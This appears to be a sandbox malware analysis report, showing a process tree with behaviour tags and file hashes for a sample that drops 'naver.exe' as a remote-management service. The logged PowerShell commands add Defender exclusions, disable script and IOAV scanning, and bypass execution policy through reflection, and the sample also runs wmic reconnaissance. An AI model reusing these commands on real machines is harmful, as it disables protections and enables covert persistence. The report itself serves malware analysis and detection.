C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionExtension '.exe' -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1272 -
C:\Users\Admin\AppData\Local\naver\naver.exeC:\Users\Admin\AppData\Local\naver\naver.exe -install5⤵
- Sets service image path in registry
- Executes dropped EXE
PID:4776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376
-
C:\Users\Admin\AppData\Local\naver\naver.exe"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4664 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992 -
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4196
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:1368
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:2316
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:4512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3908
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ccd5df1b2fc53622941f37656d05d9ae
SHA1262f63a6df3450df74215fe2555a9d7002929101
SHA2561c3322f3cbb6d038440ec7a75a3fa5c2f663dac3bb23630db29ad4f5ae180104
SHA5122b85d4cb67230a610a476b62591ccfd6a94f0010210016a260c747aa86959e0badcfb7706698513566dced03b0799e22d25885396fee153c99e7c2d214aaba62
-
Filesize
1KB
MD50dfa2abef09ea2b3e8423fb7833684fd
SHA1bfbb0511214c332a57778b3707632bfeffb6e781
SHA2567d74773bd09edc36531bcd0f5777254480155694c136c38eb1087ff1a3138c52
SHA512ceb2de65e696f07ebf41453b9341ef3b35ec1a816325d29136bf165aed780bbd5608ed0d96fde46fddaf7be261b062ac95125815616e85884158cfff3b87ede7
-
Filesize
1KB
MD57a2650a3a864ce36b4edd2168162f6a4
SHA1c5bbf438570fcb5b289d3379c9fad2b391976379
SHA256ed714586203aa7c85099686e71e5a35c18cfd7fdf46d0f0831aaf87967f0a11d
SHA5129feff35421180fd34123a9b589a136eb379edb67a3d0e096a0401ed69f2ec93bd76d740f4243ff1ce30ad1b86036cc63de6603d72a7d7891cd8b4272ee5fe560
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
131KB
MD55afb7fcd97a028b334e94d2dedbbc598
SHA100463a944db47fa2392c67459f154fcd06fc29bd
SHA256b49a2585225b96759e4f770833abf2fe4869138dc0c172e0c094382a6e002c55
SHA51201942917f588996cb9d66b21977c7ea06f179c660899c9cf4cb0a0a1310102a9097b0395a4e1f685aedf9ba15c1f6e8cb627073a7ab2f033f59c85188fdea3f5
-
Filesize
5.3MB
MD5b8d9e0cbbe14c0d930863662e263541c
SHA1b0b51d92b92f21ec721d1cf7cd2358fa81b9fe09
SHA2564b7c8a0f0074b2cd7ac1671f58dfc746fa35b9164462401b1e30710d1dbb6ec9
SHA512a73a40cb1c10a5dad67c39e8d3c4148288a7d869034e813b8bae191c7f8f3d9d07c887decfd3bdb6700c17a8fce303b0df5c8f604ebb3998306c1447bba0b1f7
-
Filesize
22KB
MD52dd515ea546a81398d94dd15e3b4d55c
SHA1eb0b0fca721a296906166b7e972559b87353b726
SHA256becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb